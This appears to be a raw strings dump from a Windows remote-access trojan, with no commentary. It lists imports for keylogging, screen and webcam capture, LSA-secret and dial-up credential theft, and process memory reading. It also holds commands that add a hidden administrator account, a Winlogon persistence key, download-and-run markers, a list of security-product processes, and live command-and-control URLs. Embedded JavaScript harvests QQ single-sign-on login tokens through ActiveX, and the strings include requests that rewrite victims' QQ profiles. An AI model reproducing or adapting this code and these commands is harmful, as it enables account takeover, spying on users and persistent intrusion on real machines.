ADVAPI32.DLL
advapi32.dll
advapi32.dll
advapi32.dll
ADVAPI32.DLL
kernel32
kernel32
kernel32.dll
kernel32.dll
kernel32.dll
ADVAPI32.DLL
ADVAPI32.DLL
ADVAPI32.DLL
kernel32.dll
kernel32.dll
ntdll.dll
ntdll.dll
kernel32.dll
ntdll.dll
ntdll.dll
kernel32.dll
user32
gdi32.dll
user32
user32
user32
urlmon
kernel32.dll
user32
user32.dll
user32.dll
atl.dll
user32
atl.dll
user32
wininet.dll
wininet.dll
wininet.dll
wininet.dll
wininet.dll
wininet.dll
wininet.dll
wininet.dll
user32.dll
kernel32
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32
kernel32.dll
gdiplus.dll
kernel32
Ole32.dll
kernel32
kernel32
kernel32.dll
gdiplus.dll
gdiplus.dll
gdiplus.dll
gdiplus.dll
ole32.dll
gdiplus.dll
gdiplus.dll
ole32
kernel32
user32.dll
user32.dll
kernel32.dll
user32
user32.dll
psapi.dll
psapi.dll
psapi.dll
psapi.dll
ntdll.dll
ntdll.dll
ntdll.dll
ntdll.dll
ntdll.dll
user32
user32
user32
user32
user32
user32
user32.dll
user32.dll
user32
Advapi32.dll
Advapi32.dll
Advapi32.dll
Advapi32.dll
gdiplus.dll
ole32
kernel32
ole32
kernel32
kernel32
kernel32
gdiplus.dll
gdiplus.dll
ole32.dll
gdiplus.dll
kernel32
gdiplus.dll
kernel32
kernel32.dll
VedioCapture.dll
VedioCapture.dll
upaxa.dll
VedioCapture.dll
VedioCapture.dll
user32
user32.dll
gdi32.dll
gdi32.dll
user32.dll
kernel32
kernel32.dll
advapi32.dll
advapi32.dll
advapi32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
shlwapi.dll
shlwapi.dll
wininet.dll
wininet.dll
wininet.dll
wininet.dll
wininet.dll
wininet.dll
wininet.dll
wininet.dll
InternetOpenA
InternetCloseHandle
InternetConnectA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
InternetReadFile
HttpQueryInfoA
MultiByteToWideChar
WideCharToMultiByte
GetVersion
capGetDriverDescriptionA
GlobalSize
RasEnumEntriesA
SHGetSpecialFolderPathA
GlobalSize
RtlMoveMemory
RasGetEntryDialParamsA
GlobalSize
RasGetEntryPropertiesA
GetPrivateProfileIntA
RasEnumEntriesA
LsaFreeMemory
GetUserNameA
LookupAccountNameA
IsValidSid
ConvertSidToStringSidW
lstrlenW
RtlMoveMemory
lstrcpyn
WideCharToMultiByte
WideCharToMultiByte
LsaOpenPolicy
LsaRetrievePrivateData
RtlMoveMemory
LsaClose
WideCharToMultiByte
CreateToolhelp32Snapshot
Process32First
CloseHandle
Process32Next
OpenProcess
VirtualQueryEx
ReadProcessMemory
CloseHandle
lstrcpyn
RtlAnsiStringToUnicodeString
RtlFreeUnicodeString
lstrcpyn
RtlUnicodeStringToAnsiString
RtlFreeUnicodeString
CallWindowProcA
GetCurrentProcess
OpenProcess
SetProcessWorkingSetSize
GetLogicalDriveStringsA
GetDriveTypeA
GetDC
StretchBlt
GetDesktopWindow
ReleaseDC
SendMessageA
URLDownloadToFileA
EnumDisplaySettingsA
ChangeDisplaySettingsA
lstrcpyn
PeekMessageA
TranslateMessage
DispatchMessageA
ShellExecuteA
AtlAxWinInit
CreateWindowExA
AtlAxGetControl
SendMessageA
InternetOpenA
InternetCloseHandle
InternetConnectA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
InternetReadFile
HttpQueryInfoA
CreateWaitableTimerA
SetWaitableTimer
MsgWaitForMultipleObjects
CloseHandle
MultiByteToWideChar
WideCharToMultiByte
CreatePipe
CreateProcessA
PeekNamedPipe
ReadFile
lstrcpyn
CallWindowProcA
GetExitCodeProcess
ShowCursor
GetVersion
ExitWindowsEx
OpenProcessToken
LookupPrivilegeValueA
AdjustTokenPrivileges
MessageBoxA
MessageBoxTimeoutA
SwapMouseButton
GetModuleHandleA
SetWindowsHookExA
CallNextHookEx
SystemParametersInfoA
GetWindowsDirectoryA
GetSystemDirectoryA
GetTempPathA
GdiplusStartup
GlobalAlloc
CreateStreamOnHGlobal
GlobalLock
GlobalUnlock
lstrcpyn
GdipCreateBitmapFromStream
GdipCreateHBITMAPFromBitmap
GdipCreateBitmapFromHBITMAP
GdipSaveImageToStream
GetHGlobalFromStream
GlobalSize
RtlMoveMemory
GlobalFree
GdipDisposeImage
GdiplusShutdown
CLSIDFromString
CreateToolhelp32Snapshot
Process32First
Process32Next
CloseHandle
EnumWindows
GetWindowTextA
GetWindowTextLengthA
RtlFillMemory
lstrcpyn
GetClassNameA
GetWindowThreadProcessId
EnumProcessModules
GetProcessMemoryInfo
GetModuleBaseNameA
GetModuleFileNameExA
ZwOpenProcess
ZwQuerySystemInformation
lstrcpyn
RtlMoveMemory
RtlMoveMemory
ZwDuplicateObject
ZwQueryInformationProcess
ZwClose
IsZoomed
IsIconic
IsWindowEnabled
IsWindowVisible
PostMessageA
SetWindowTextA
CloseWindow
EnableWindow
ShowWindow
EnumChildWindows
GetVersionExA
OpenSCManagerA
EnumServicesStatusA
RtlMoveMemory
CloseServiceHandle
GetProcessHeap
HeapAlloc
HeapFree
EnumServicesStatusExA
RtlMoveMemory
OpenServiceA
ControlService
StartServiceA
GdiplusStartup
CLSIDFromString
GlobalAlloc
CreateStreamOnHGlobal
GlobalLock
RtlMoveMemory
GlobalUnlock
lstrcpyn
GdipCreateBitmapFromStream
GdipSaveImageToStream
GetHGlobalFromStream
GlobalSize
RtlMoveMemory
GdipDisposeImage
GlobalFree
GdiplusShutdown
MultiByteToWideChar
lstrlenA
lstrcpyn
RtlMoveMemory
RtlMoveMemory
CallWindowProcA
GetWindowLongA
SetWindowLongA
SetLayeredWindowAttributes
OpenFileMappingA
MapViewOfFile
RtlMoveMemory
SetCameraID
StartCamera
PostMessageA
CreateWaitableTimerA
SetWaitableTimer
MsgWaitForMultipleObjects
start
UnhookWindowsHookEx
SaveBmp
CloseCamera
GetForegroundWindow
GetDC
CreateFontIndirectA
SelectObject
SetBkMode
SetTextColor
TextOutA
DeleteObject
ReleaseDC
GetLogicalDriveStringsA
GetCurrentProcess
OpenProcessToken
LookupPrivilegeValueA
AdjustTokenPrivileges
CreateMutexA
WaitForSingleObject
ReleaseMutex
CloseHandle
PathFindFileNameA
PathFindExtensionA
CreateThread
CloseHandle
lstrcpyn
GetModuleHandleA
GetProcAddress
GetCurrentThread
CallWindowProcA
GetForegroundWindow
PostMessageA
CryptAcquireContextA
CryptCreateHash
CryptReleaseContext
CryptHashData
CryptDestroyHash
CryptGetHashParam
RtlMoveMemory
InternetOpenA
IsWindow
CreateThread
PostMessageA
GetTickCount
SetWindowLongA
SetLayeredWindowAttributes
ShowWindow
UpdateWindow
GetWindowRect
MoveWindow
CreateWaitableTimerA
SetWaitableTimer
MsgWaitForMultipleObjects
SetWindowLongA
RtlMoveMemory
FindWindowA
RtlMoveMemory
CallWindowProcA
GetForegroundWindow
GetCurrentProcessId
GetWindowThreadProcessId
GetKeyState
SendMessageA
InternetOpenUrlA
InternetReadFile
InternetCloseHandle
InternetConnectA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestA
GetAsyncKeyState
CallWindowProcA
d09f2340818511d396f6aaf844c7e325
A6B983789F624b2cBDFD7D671249C097
F7FC1AE45C5C4758AF03EF19F18A395D
52F260023059454187AF826A3C07AF2A
5014D8FA6DCA40b68FA626D8183666EB
707ca37322474f6ca841f0e224f4b620
730FA7B73AAB409a8554F9553CF2DD87
8FA3AA46276847db8F28E57E7FB97B7F
4BB4003860154917BC7D8230BF4FA58A
A512548E76954B6E92C21055517615B0
27bb20fdd3e145e4bee3db39ddd6e64c
7F54B9CE8887428dBA9CEEB94CEF4C72
5F99C1642A2F4e03850721B4F5D7C3F8
window
EditBox
PicBox
DrawPanel
Label
Button
ProcessBar
Timer
Client
ComObject
Variant
SystemInfo
HtmlViewer
capControl
TransLabel
ver.txt
sip=[
7B91734DE94E408EA543C64BF677703482E5369233301F4A26E79B
255.255.255.255
www.zhengren.vip
https://
User-Agent:
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Accept: */*
Accept:
Accept: */*
Referer:
Referer:
Accept-Language:
Accept-Language: zh-cn
Content-Type:
Content-Type: application/x-www-form-urlencoded
Cookie:
Cookie:
Set-Cookie
Set-Cookie:
http://
https
=deleted
adminakang_kn_www.52blt.net_sujiankangwoaini!
https://www.so.com/s?q=ip
<p class="mh-detail "><span>
</span><span>
</span></p>
https://www.sogou.com/web?query=ip
<strong>
\ipget.txt
http://www.baidu.com/s?wd=ip
</span>
IP:&nbsp;
</td></tr>
cj_id.asp?name=
no...
yes2yes
error 2'
cj_pasp.asp?zh=
cj_xinxiasp.asp?zh=
z>Windows 2000
Window XP
Windows Server 2003
Windows Vista
Windows 7
Windows 8
QQ.exe
y2*z-
&ss=<.>
\p2.asp?s=
\Microsoft\Network\Connections\pbk\rasphone.pbk
DialParamsUID
RasDialParams!
L$_RasDefaultCredentials#0
Msg3.0.db
&mls=
\p2.asp?ml=
c:\windows\_temp2.bmp
c:\windows\_temp3.jpg
[pm00]
/tpsc.asp
&name=
ImgUp=
Y@scwb
[dVgu]
[gAqY]
[QAqY]
[c_s]
[/gj]
/add
net user
/active:yes
net localgroup Administrators
net user Administrator /active:no
username
/fullname:
[eez5]
zdyts
[t8s6]
taoli
[li2o]
yinliao
[e5tz]
downap
[gb9q]
[qx9q]
[q293]
[p85z]
c:\zzjggs.mp3
/006.mp3
c:\025.mp3
/025.mp3
[zmp1]
c:\zr1.mp3
http://www.hot88.top/z/mp3/1.mp3
[zmp2]
c:\zr2.mp3
http://www.hot88.top/z/mp3/2.mp3
[zmp3]
c:\zr3.mp3
http://www.hot88.top/z/mp3/3.mp3
[zmp4]
c:\zr4.mp3
http://www.hot88.top/z/mp3/4.mp3
[zmp5]
c:\zr5.mp3
http://www.hot88.top/z/mp3/5.mp3
[zmp6]
c:\zr6.mp3
http://www.hot88.top/z/mp3/6.mp3
c:\023.mp3
/023.mp3
c:\111._.mp3
[fblx]
[g91m]
[h91m]
[drun]
c:\downfile\
[pmy1]
[zm2q]
[gbc5]
[egl2]
[01wb]
[av88]
[gjjb]
[getb]
[g1g2]
[sb13]
[sb14]
\loginZ.exe
[ycrw]
[xsry]
[yxzm]
[xszm]
[xsks]
[ycks]
[k22p]
[k1sp]
[gbsp]
http://www.aidown.top/z/1.html
[jbbb]
778C6A1D843227CCFF17841386544274C9A024F44F111C0C22F887A8A561B75DD9AC1CB677C2113BB2149A0B14B4E479CCFAA1C8332516F0D6524AF885658798D5F197AB15E6112E54FE6702620909CB364D7E44F8A1D6088C536F683CE54BB6C3406886A5A5F932E55592A1EFE32EA2C8E89775884DD7A786C7D557F1107A808E650A839FAEB0BEDE63F36583F5AF8786F7E25C191813EBB841649ECCF76BC03A0ADA0455C4D7626E4363E366CA85AE849B604D8F694D019E1B1704D7CD2DB0FD244C826FA8FC386FB49B8FA4E038B9613ED53A0CBB531394ED5F8BC6F69372EF270950755446CF52267E0934EBC58266C3ABFA928B442FF690D8720922C737F380D9F36EB4BA9B12BEB7A4C822F85D3B9CB335933FF6D947FA23C8E872397FF1C5D5CB69993BFC5EBFE417A377ED2AA5D37D98F149C1095CC25A1F11C74D19D22657379D25FFBE8494BE686F9AE0A07B9025C6DD4A29A74725319E95DD14094090EC10E732CC7E879A6A08DCA7420E1A14F362ECF0F0F04A8A7FCEDB090BA740EC21F57B02F9CD62F010D0F0F29687D924A0E22401B65020341D00E1851C31768A770F7926D844B8FF707E6E5957729E3E69F900D3CFAB9C1BE39CF8FE92405C293E8A644588CF3FD0570884144DCE7773EE638D228FBE92AA252B75DDE30288F0A1587D787529950FA2E5C2668CB9348D4ABBA748C14809C42A90A5DB49355B0464EF8D3C615B1A744CB8609599F1782F870A2EEA02634101C5D3930B86BFF8DB34C491A7E40B53791DECF65FEBA3064FD61B6A00BBCFD395FB6B1298D66376E6762B2E74D9CAc:\temp_s.vbs
7C8B2758A11300CDB7008D0CB2342D27C2B17CD711530B0D2AB4BCBACD2FFF4FC6A32FD20DC55A2CE026A83702B3E37FC5D8F5DD312516F0D6524AF885759D98D8E9D0ED7A86231E68A52D107D063A8C344C3E17B2A7D700801F1A074B9960E5D84D719E80E4FC29AB58C2E2AFF320F180AD9A39CB4F86722303678850DDF61F47F8F747692C5630239165B175015EFABD8BD35558036D9BED5F73EFDB835B798C94C75B489BD2E4EDC7E06B74C889F8DADE256CF17F5109B3707E67DE826CCA9F294FC730A1B56834BCD81F4E6ECEB93B51FD72218C125AC7BD4391D4EC9F30A87D94A8E74943DD9D527499AD217F1BBED0CEE6D2FA4C35A49FB3EAF9BEBA58B5F55715AD2C6E00FFCD88B7D0BD045DA505CA3BEC1FEBD753E8609AE669317FF1DCF4F634DA6CB73CCDA907AC67AA63B69935C1F91B9A5254D84955599E454B897D5F2D8E6FB7E78CC4A17163938DB230E2669CB23444894732639E95DC080152F29E5DF73DDC39CE89204085AF1055411CE971A6B8A9F818D124C6C11A41EF19E43212B59F02538D993EA8C5F49A777EE32E3EF9E02A21654D110CE0C946684D9C6B4A42199D3DA3FF683219373F76853877FC509AC1BF9D1DF081EDE5DE494B2F2BD6235D99C628DA5354881056C86976BC3EAE5BB088B6B56F6714BB9A23B5EDE91F72793F758519E7E78E68C8E439805BFFE75C8F1B4CD07CD8FA8C0B61041023CEB7713E480A6E5195099098BE2B73D60A66A21323021ADDC0910BCEF7E99B77DF89B4E60B1B314D7D39D53C3AD3D60A7C2502E1C796AE8C037EE4E2FACB4FB7E28AAF62909754F85272EDC7858995DF407005C2CB4AF94E278A01B043B188E5FA1FE84566BDF0ED7B1332DD71B77306EA28E2FE4BB3C9488179D01ADA05AF7FAA31D445113BB3A7DBE976CB0D1499DD644152BBEB316DC469E76D606FC77B57689467C6A15FBA8CD1BAD2230CEC6D8259206618C0E9918EB05C5A682231C2362D419F8F49364818E9D698CBA1B943DA989B9566073CC99897ED5E77A3D2369E4C6598A6D8DDC21C895F4E79C1A78A8DD11AF09F265DDBE8D0851E59BDF52F1989310B52E0C78C95A2E2F81AE268606BFFAF2CED1076DE8F2D691DFFCD4CFD761FEFF9E18669057DF9CC57EB3C30F616FA0FA3FA9C16795B9238CF91CED419F8BCD9D320837501285D12C13AB435CC424A203E6D76DA1AF3764C5D0A3BAB3F5DF67C6EE34097FA2AC0B97C8D7D6EC90399D96E309EFF31F20CC71F116BA6F9E5D0F62AD3A27CBC86D261D0E8B623B12826FDFFC1DF61AA64252912B50495B46918D5143E4E9D20F7CDB8033B9886F116F0F07141BD05A54359D1B0AB4D8D7A78170138CDBA3E41818A09A8A44C38DFA0286F702B0DE8E15630BDFC8171E0C7E9D03D741F5C4600C03DA3205EB5B3C12BEA6FCCFFFC7DF4E384DADAAFF0DEB6094635B1ECD0F76F23B6DE154B5D8FA07ED80D8C5A246F13573307B7340CF44EE6B1AD03FEE3D43A1183AA014DD1DFB2F57F54AC8BB7BC9E57BAE45FF42278C1542F8E5AE2FF2762B357DBF3D833E1B1BE1ADC1299F66E0950AEEA84EF596F7FD20E7FDF16F93549CAF6C5B29021A7550650D583AE90E025910246B26E4C16757E0BBC5AED215BD334E4F1BBA6F4BF13959FEBCBB3E09061A263A95DBD350DA79C3ECAD9F8FB717902BEDFEE0C1FBC276487746681FAB7C7F4108548CC832CF9F8C7F692CDF4D61983D0977660ED2789012D229987BA9BD0DC8144C34DE4F39FBAC1AF676BF624E3E02B9428ACFBCED0C46341E16EB30E821D8BFCC6552F25595266EDBF2D79977E6F32692155E0706BD5C87CCD933512091A9AF1F2AFF51F8942F8E568A740219F573D6194CDF9D7A360C31B86A10D44CA9FD78FC136E446B0DB1D106D9711E7348FB593C3E2CCAC48722A1B83F7D1DA58A5BA58C45CD37AA125DB381C9A912E0C0CA8B9CF021667F0C8A6F9F99CC70B61B1909B56E0233951D469346218F5FE430E42F35E2BDB47E330D897F8CA778FC728563B97FE1BCCFBC20E389EB8551E5D5D6C16F6D360EF23CC4032719B9F647F9ECD359B6C0BF5C99A80EE07B3D3C567391850EE3D6132DE5799BF45C64BB6B9C72AEC8EFEC131CA3F6F02822A37920594E6A315B27596C3AB469CCF25981CCB42B367EE21D9743AB55647FDC73CC8E41463C4B2F62316CCBE51128E38C88350CCCCFCBFBD99A7741A69E731BCF6FA740753D7C6425C8B2355C64CD9081442BBDA466AD682F86ACE13B3EEAFD70704E76C64B945B821F3FED37AB94F2AB516903553B2C65D5D01BBAE07F23C4082AEE7B319BD07FB6221C146A50DA6521A3C477335F209CAB9F907B962[htwz]
[qtll]
[tcxx]
[sbxh]
[sbhf]
[sbsd]
[sbb3]
[gb55]
!#?9'
c:\bz.jpg
[hfb9]
c:\bbz.jpg
[xx11]
[kijc]
[wfla]
/flashkq.swf
wlfhasl
&keyindex=9&pt_aid=549000912&u1=http%3A%2F%2Fqzs.qq.com%2Fqzone%2Fv5%2Floginsucc.html%3Fpara%3Dizone
&clientkey=
http://ptlogin2.qq.com/jump?clientuin=
http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&pageindex=1&fupdate=1
&emoji=&sex=1&birthday=1988-11-01&province=43&city=10&country=1&marriage=0&bloodtype=5&hp=0&hc=0&hco=0&career=&company=&cp=0&cc=0&cb=&cco=0&lover=&islunar=0&mb=65&uin=
qzreferrer=http%3A%2F%2Fcnc.qzs.qq.com%2Fqzone%2Fv6%2Fsetting%2Fprofile%2Fprofile.html%3Ftab%3Dbase&nickname=
http://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
SSOAxCtrlForPTLogin.SSOForPTLogin2
http://xui.ptlogin2.qq.com/cgi-bin/qlogin
AtlAxWin
Silent
ReadyState
Document
parentWindow
JavaScript
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g++){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y++){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0"+B};N+=B};text+=P+'|'+U+'|'+N+';'}}catch(b){}};return text};
execScript
innerText
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Referer:
Location:
scriptcontrol
JScript
Language
})})
AddCode
getACSRFToken("
&pageindex=3&fupdate=1
&mb=14336&uin=
&signature=
&desc=
qzreferrer=http%3A%2F%2Fcnc.qzs.qq.com%2Fqzone%2Fv6%2Fsetting%2Fprofile%2Fprofile.html%3Ftab%3Dspace&spacename=
http://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
command.com /c
cmd.exe /c
SeShutdownPrivilege
SeDebugPrivilege
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
.tiff
{557CF406-1A04-11D3-9A73-0000F81EF32E}
[System Process]
System
A@\Description
SYSTEM\CurrentControlSet\Services\
\Start
\ObjectName
NT AUTHORITY\LOCALSERVICE
NT AUTHORITY\NETWORKSERVICE
LOCALSYSTEM
@/flashkq.fne
http://zryk.aa3e.com/
yanhua.swf
qi_e.swf
qiao.swf
xiaxueswf.swf
http://demo.sc.chinaz.com/Files/DownLoad/flash2/201605/flash4527.swf
xuanwo.swf
baaaoli.swf
boli.swf
doadwg.swf
dog.swf
zrgui.swf
heidongz.swf
hudiez.swf
konglongs.swf
shayuzr.swf
shengriklz.swf
wuguizr.swf
xiyizrk.swf
xiayulo1.swf
http://demo.sc.chinaz.com/Files/DownLoad/flash2/201508/flash3853.swf
yaziswf.swf
yanhua2.swf
bingbi2ngbing.swf
type=application/x-shockwave-flash wmode=transparent quality=high ;></EMBED> </div>
height=
<head><div align=center><embed src=http://www.baidu.com/kq.swf style=LEFT: 0px; POSITION: absolute; TOP: 0px; absolute: align=right width=1024 height=768 type=application/x-shockwave-flash wmode=transparent quality=high ;></EMBED> </div> <div align=center><embed src=flashkq.swf style=LEFT: 0px; POSITION: absolute; TOP: 0px; absolute: align=right width=
>@.tmp
Super-EC
C:\windows\web\
TXGuiFoundation
c:\111666.bmp
c:\111666.jpg
\hot.bmp
\hot.jpg
/do.txt
\zrml.txt
http://www.hot88.top/?upaxa
dllurl.txt
\upaxa.dll
zzrwglq
Qzrwglq
gbxsq1
qxgbxsq
[Tz_r]
[s1_j]
zhendong2
ggs333
zmp31
zmp32
zmp33
zmp34
zmp35
zmp36
ggs111
zzjggs
qxggs
c:\11asd1._.mp3
gbddk2
yc1sz
pm5xz
pm6xz
ggzmwjm
hyzmwjm
fblxg
xs1sz
qqnic
pmfz1
bzmpq
mngsh
egaolp
testzx
QQwb1
01wb2
D71FD2C007BBD74545C950897D858DA41D12B167A683D0A986502705BF
C61ECFF607D7D067
downrun0
downrun1
downrun2
sp1kq
sp1gb
jianshizm
dkzm2
getjjb2
yebzla
egaotz
taolixc
***********
C:\windows\web\CS2.bmp
C:\windows\web\CS2.jpg
taskmgr.exe
c:\zryk_kb.gif
http://zryk.aa3e.com/zrvip/bug.gif
http://www.zhengren.vip/bug.gif
bbs.125.la
7B91734DE94E408EA543C64BF677703482E5369233
uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu
1076956519|.|***********************************************************************************************************
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
ababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababa
|q23512351235123512351235123512351235123
111111111111111111111111111111111111111111111111111111111111
abcdefghijklmnopqrstuvwxyz1234567890
Kgmusic.exe
KuGou\
uninstalla.exe
QQZR\
usysdiag.exe
PerfLogs\
msdtcws.exe
Program Files\Player\
HipsDaemon.exe
Program Files\ABC\
logonuisd.exe
UserInterface\
dotnetfx.exe
Microsoft\
/.0/.0/
LoginZ.exe
LoginZ_
49B75E76E1515E89B9118712
a*k_tupian
a*k_swf
flash
D71FD2C007BBD57245C95089891BFDC3160EBB6EAA8DD4D46B5300384A97779F49F5
444444444
\ip.txt
QQ:2582817973
userinit.exe,
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
VedioCapture.dll
`DATA
.idata
.edata
P.reloc
P.rsrc
Int64
Single
OleVariant
System
IInterface
;= FG
UhM'@
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
Ph,7@
Uh2<@
t@hDU@
kernel32.dll
GetLongPathNameA
Uh]V@
Software\Borland\Locales
Software\Borland\Delphi\Locales
Uh(Y@
Magellan MSWHEEL
MouseZ
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
EInOutError4t@
EZeroDivideXw@
EInvalidPointerdx@
=?\}@
False
AM/PM
D$LPj
WUWSj
m/d/yy
mmmm d, yyyy
AMPM
AMPM
:mm:ss
kernel32.dll
GetDiskFreeSpaceExA
oleaut32.dll
VariantChangeTypeEx
VarNeg
VarNot
VarAdd
VarSub
VarMul
VarDiv
VarIdiv
VarMod
VarAnd
VarOr
VarXor
VarCmp
VarI4FromStr
VarR4FromStr
VarR8FromStr
VarDateFromStr
VarCyFromStr
VarBoolFromStr
VarBstrFromCy
VarBstrFromDate
VarBstrFromBool
Variants
Uh]!A
Uhe"A
Uh>/A
Uho4A
Empty
Smallint
Integer
Single
Double
Currency
OleStr
Dispatch
Error
Boolean
Variant
Unknown
Decimal
ShortInt
LongWord
Int64
Uh&7A
String
Array
ByRef
t~h,HG
Uhs<A
Uh5>A
False
IPersistStream0FA
IMoniker`FA
tagEXCEPINFO
Classes4IA
TNotifyEvent
TObject
EFOpenError0KA
EWriteError8LA
EComponentError\NA
zr0PA
Classes
Classes
TStringsxSA
Classes
TStringListPUA
Classes
TStream0VA
Classes
Uh_cA
UhofA
UhWiA
Uh+jA
Uh&lA
UhwlA
UhVqA
;5t\A
Uh|sA
UhXwA
Uh5zA
Uhf{A
Uh7|A
UhS}A
Strings
Owner
;-PQA
False
%s_%d
ulj@h
TPUtilWindow
Graphics
Graphics
Graphics
Graphics
Graphics
Graphics
clBlack
clMaroon
clGreen
clOlive
clNavy
clPurple
clTeal
clGray
clSilver
clRed
clLime
clYellow
clBlue
clFuchsia
clAqua
clWhite
clMoneyGreen
clSkyBlue
clCream
clMedGray
clActiveBorder
clActiveCaption
clAppWorkSpace
clBackground
clBtnFace
clBtnHighlight
clBtnShadow
clBtnText
clCaptionText
clDefault
clGradientActiveCaption
clGradientInactiveCaption
clGrayText
clHighlight
clHighlightText
clHotLight
clInactiveBorder
clInactiveCaption
clInactiveCaptionText
clInfoBk
clInfoText
clMenu
clMenuBar
clMenuHighlight
clMenuText
clNone
clScrollBar
cl3DDkShadow
cl3DLight
clWindow
clWindowFrame
clWindowText
ANSI_CHARSET
DEFAULT_CHARSET
SYMBOL_CHARSET
MAC_CHARSET
SHIFTJIS_CHARSET
HANGEUL_CHARSET
JOHAB_CHARSET
GB2312_CHARSET
CHINESEBIG5_CHARSET
GREEK_CHARSET
TURKISH_CHARSET
HEBREW_CHARSET
ARABIC_CHARSET
BALTIC_CHARSET
RUSSIAN_CHARSET
THAI_CHARSET
EASTEUROPE_CHARSET
OEM_CHARSET
Default
E$PVSj
Uhx"B
UhX"B
Uh1(B
UhV*B
Uh/*B
Uhr,B
Uh{-B
Uh!/B
UhG0B
Uh_5B
PhX4B
Php5B
Uht;B
Uh(AB
UhsBB
UhSBB
Graphics
UhrDB
UhJDB
UhkHB
UhfNB
Uh?QB
UhaVB
UhS]B
UhgaB
Uh;aB
Uh]hB
D$*Ph
\$4Vj
UhMsB
Uh?tB
GetMonitorInfoA
GetSystemMetrics
MonitorFromRect
MonitorFromWindow
MonitorFromPoint
>(r[j
GetMonitorInfo
DISPLAY
>(r[j
GetMonitorInfoA
DISPLAY
>(r[j
GetMonitorInfoW
DISPLAY
EnumDisplayMonitors
USER32.DLL
UhM~B
comctl32.dll
InitializeFlatSB
UninitializeFlatSB
